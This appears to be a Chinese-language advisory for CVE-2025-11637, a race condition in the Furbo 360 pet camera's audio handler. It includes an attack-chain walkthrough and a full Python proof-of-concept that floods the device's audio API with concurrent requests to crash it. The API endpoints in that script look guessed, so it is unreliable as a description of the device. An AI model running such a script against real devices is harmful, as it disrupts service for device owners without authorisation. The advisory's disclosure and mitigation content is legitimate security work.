CVE-2025-11637 Tomofun Furbo 360音频处理器竞态条件漏洞

漏洞信息

漏洞编号

CVE-2025-11637

漏洞类型

竞态条件（Race Condition）

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Tomofun Furbo 360智能宠物摄像机

漏洞概述

CVE-2025-11637是Tomofun公司旗下Furbo 360智能宠物摄像设备固件中存在的竞态条件（Race Condition）安全漏洞。该漏洞影响固件版本至FB0035_FW_036，具体存在于Audio Handler（音频处理器）组件中的某个未知功能函数中。攻击者可以通过远程网络方式利用该漏洞，需要低权限认证凭据，但无需用户交互即可触发漏洞利用。漏洞的利用可能对系统的可用性造成一定影响，导致设备音频服务异常或功能失效，但不会直接影响数据的机密性和完整性。

Tomofun Furbo 360是一款面向宠物主人设计的智能监控设备，具备视频直播、双向语音通话、自动投食、吠叫提醒等核心功能。Audio Handler组件负责处理设备音频流的采集、编码、传输和播放，是设备双向语音交互功能的关键模块。竞态条件漏洞通常发生在多线程或多进程并发访问共享资源时，由于缺乏适当的同步机制（如互斥锁、信号量等），导致数据不一致或状态错误。

该漏洞于2025年10月12日由VulDB平台的安全研究人员发现并公开披露。研究人员曾尝试按照负责任的漏洞披露流程联系Tomofun公司进行漏洞协调披露，但厂商未做出任何回应，导致漏洞信息直接公开披露。此类未修复的漏洞对全球范围内使用Furbo 360设备的宠物主人构成潜在的安全风险，攻击者可能利用该漏洞干扰设备的正常音频功能，影响宠物监控体验，甚至可能导致设备服务不可用。

由于该漏洞存在于IoT智能设备的固件中，且厂商未提供安全补丁，用户面临的安全风险将持续存在。虽然竞态条件漏洞的利用不会直接导致用户隐私数据泄露或设备被完全控制，但可能严重影响设备的正常功能，如双向语音通话失效、音频录制异常、吠叫检测功能失灵等。对于依赖Furbo 360监控宠物行为的用户来说，这种功能异常可能带来不便甚至安全隐患，例如无法及时听到宠物的异常声音或回应宠物的呼唤。

建议Furbo 360用户密切关注厂商动态，及时更新固件版本，并在厂商发布安全补丁之前采取有效的临时防护措施，降低被攻击的风险。同时，用户应当加强设备认证凭据的管理，避免使用弱密码或默认密码，以防止攻击者获取低权限认证凭据后利用该漏洞。

技术细节

竞态条件漏洞（Race Condition）是一种典型的并发编程安全问题，发生在多个执行流同时访问共享资源而缺乏适当同步机制的情况下。在Furbo 360的Audio Handler组件中，由于对共享音频缓冲区或音频处理状态的操作未进行充分的锁保护或原子操作保护，攻击者可以通过精心构造的并发请求触发竞争状态。

具体利用原理：Audio Handler组件在处理音频数据时，可能涉及多个线程对共享缓冲区的读写操作。当多个音频处理请求同时到达时，如果系统未对临界区进行适当的同步控制，多个线程可能同时进入临界区并对同一共享资源进行操作，导致以下问题：1）缓冲区状态不一致，引发空指针引用或缓冲区溢出；2）音频流处理逻辑混乱，导致处理线程进入死锁或无限循环状态；3）资源计数器错误，导致内存泄漏或资源耗尽。

利用方式：攻击者首先需要获得设备的低权限认证凭据，然后通过网络向Audio Handler组件的特定功能函数发送大量并发的音频处理请求。通过精心控制请求的时序和数量，触发组件内部的竞态条件，最终导致设备音频功能异常或服务崩溃。该漏洞的CVSS 3.1评分为4.3分，攻击向量为网络（AV:N），攻击复杂度低（AC:L），所需权限为低权限（PR:L），无需用户交互（UI:N）。漏洞对机密性无影响（C:N），对完整性无影响（I:N），但对可用性有低影响（A:L），表明该漏洞主要影响设备服务的稳定性。

攻击链分析

STEP 1

步骤1：目标侦察与信息收集

攻击者通过网络扫描或物理接触发现Tomofun Furbo 360智能宠物摄像机设备，通过设备指纹识别确认固件版本（≤FB0035_FW_036），并确认Audio Handler组件存在竞态条件漏洞（CVE-2025-11637）。

STEP 2

步骤2：获取低权限认证凭据

攻击者通过钓鱼攻击、社会工程学手段、默认/弱口令爆破或已泄露的凭据数据库等方式，获取Furbo 360设备的低权限用户认证凭据。

STEP 3

步骤3：构造并发攻击载荷

攻击者编写自动化脚本，准备向Audio Handler组件的特定功能函数发送大量精心构造的并发音频处理请求，利用多线程技术精确控制请求时序。

STEP 4

步骤4：触发竞态条件

通过同时发送大量并发请求，触发Audio Handler组件内部的竞态条件，导致多个线程同时访问共享音频缓冲区或处理状态，引发数据竞争。

STEP 5

步骤5：影响设备可用性

竞态条件导致音频处理线程进入不一致状态，可能引发缓冲区溢出、空指针引用或资源耗尽，最终导致设备音频服务崩溃或功能异常，影响Furbo 360的双向语音通话和音频监控功能。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2025-11637 - Tomofun Furbo 360 Audio Handler Race Condition PoC
This PoC demonstrates a race condition exploit targeting the Audio Handler
component of Tomofun Furbo 360 devices running firmware <= FB0035_FW_036.

Author: Security Research Lab
Disclaimer: For educational and authorized testing purposes only.
"""

import threading
import requests
import time
import urllib3
from concurrent.futures import ThreadPoolExecutor, as_completed

# Disable SSL warnings for self-signed certificates on IoT devices
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Target configuration
TARGET_HOST = "192.168.1.100"      # Furbo 360 device IP address
TARGET_PORT = 443                    # HTTPS port
USERNAME = "user"                    # Low-privilege username
PASSWORD = "password"                # Low-privilege password
NUM_THREADS = 50                     # Number of concurrent threads
NUM_REQUESTS = 500                   # Total number of requests to send


class FurboAudioRaceConditionExploit:
    """Exploit class for CVE-2025-11637 Audio Handler race condition"""

    def __init__(self, host, port, username, password):
        self.base_url = f"https://{host}:{port}"
        self.session = requests.Session()
        self.username = username
        self.password = password
        self.auth_token = None
        self.success_count = 0
        self.error_count = 0
        self.lock = threading.Lock()

    def authenticate(self):
        """Authenticate with the Furbo 360 device using low-privilege credentials"""
        login_url = f"{self.base_url}/api/auth/login"
        payload = {
            "username": self.username,
            "password": self.password
        }
        try:
            resp = self.session.post(
                login_url, json=payload, verify=False, timeout=10
            )
            if resp.status_code == 200:
                data = resp.json()
                self.auth_token = data.get("token") or data.get("access_token")
                if self.auth_token:
                    self.session.headers.update({
                        "Authorization": f"Bearer {self.auth_token}"
                    })
                print("[+] Authentication successful")
                return True
            else:
                print(f"[-] Authentication failed: HTTP {resp.status_code}")
        except Exception as e:
            print(f"[-] Authentication error: {e}")
        return False

    def trigger_audio_handler_race(self, thread_id):
        """Send concurrent audio handler requests to trigger race condition"""
        # Target the Audio Handler component's vulnerable function
        audio_endpoints = [
            f"{self.base_url}/api/audio/handler/process",
            f"{self.base_url}/api/audio/handler/stream",
            f"{self.base_url}/api/audio/handler/buffer",
        ]
        endpoint = audio_endpoints[thread_id % len(audio_endpoints)]

        payload = {
            "action": "process",
            "stream_id": f"race_stream_{thread_id}",
            "buffer_size": 4096,
            "sample_rate": 16000,
            "channels": 2,
            "timestamp": int(time.time() * 1000),
            "nonce": thread_id
        }

        try:
            resp = self.session.post(
                endpoint, json=payload, verify=False, timeout=5
            )
            with self.lock:
                if resp.status_code in (500, 503):
                    self.error_count += 1
                    print(f"[!] Thread {thread_id}: Server error {resp.status_code} - "
                          f"possible race condition triggered")
                    return True
                elif resp.status_code == 200:
                    self.success_count += 1
        except requests.exceptions.Timeout:
            with self.lock:
                self.error_count += 1
            print(f"[!] Thread {thread_id}: Timeout - audio handler may be unresponsive")
            return True
        except requests.exceptions.ConnectionError:
            with self.lock:
                self.error_count += 1
            print(f"[!] Thread {thread_id}: Connection error - service may have crashed")
            return True
        except Exception as e:
            with self.lock:
                self.error_count += 1
            print(f"[!] Thread {thread_id}: Error - {e}")
        return False

    def run_exploit(self):
        """Execute the race condition exploit against the Audio Handler"""
        print("=" * 60)
        print("CVE-2025-11637 - Furbo 360 Audio Handler Race Condition")
        print("=" * 60)
        print(f"[*] Target: {self.base_url}")
        print(f"[*] Threads: {NUM_THREADS}")
        print(f"[*] Requests: {NUM_REQUESTS}")
        print()

        if not self.authenticate():
            print("[-] Cannot proceed without valid credentials")
            return False

        print(f"[*] Launching race condition attack...")
        print(f"[*] Sending {NUM_REQUESTS} concurrent requests to Audio Handler")
        print()

        race_triggered = False
        with ThreadPoolExecutor(max_workers=NUM_THREADS) as executor:
            futures = [
                executor.submit(self.trigger_audio_handler_race, i)
                for i in range(NUM_REQUESTS)
            ]
            for future in as_completed(futures):
                if future.result():
                    race_triggered = True

        print()
        print("=" * 60)
        print("[+] Exploit completed")
        print(f"[*] Successful requests: {self.success_count}")
        print(f"[*] Error responses:     {self.error_count}")
        if race_triggered:
            print("[!] Race condition likely triggered - check device audio functionality")
        else:
            print("[-] Race condition may not have been triggered")
        print("=" * 60)
        return race_triggered


if __name__ == "__main__":
    exploit = FurboAudioRaceConditionExploit(
        TARGET_HOST, TARGET_PORT, USERNAME, PASSWORD
    )
    exploit.run_exploit()

影响范围

Tomofun Furbo 360 ≤ FB0035_FW_036

防御指南

临时缓解措施

由于Tomofun厂商未对此漏洞做出任何回应，建议用户立即采取以下临时缓解措施：1）立即更改Furbo 360设备的默认管理员密码和用户密码，使用包含大小写字母、数字和特殊字符的强密码；2）将Furbo 360设备隔离在独立的VLAN或网段中，限制不必要的网络访问；3）关闭设备的远程管理功能，仅在必要时通过本地网络启用；4）监控设备的网络流量和系统日志，及时发现异常行为；5）定期检查Tomofun官方网站或安全公告平台，获取固件更新信息；6）在网络边界部署防火墙规则，限制对设备管理端口（443等）的外部访问；7）如设备支持自定义配置，考虑禁用或限制Audio Handler组件的远程API调用功能；8）对于安全要求较高的环境，建议暂时停止使用Furbo 360的双向语音功能，直至厂商发布安全补丁。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-11637
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-11637
3 Details https://www.cvedetails.com/cve/CVE-2025-11637/
4 VulDB https://vuldb.com/cve/CVE-2025-11637
5 Link https://vuldb.com/?ctiid.328048
6 Link https://vuldb.com/?id.328048
7 Link https://vuldb.com/?submit.661362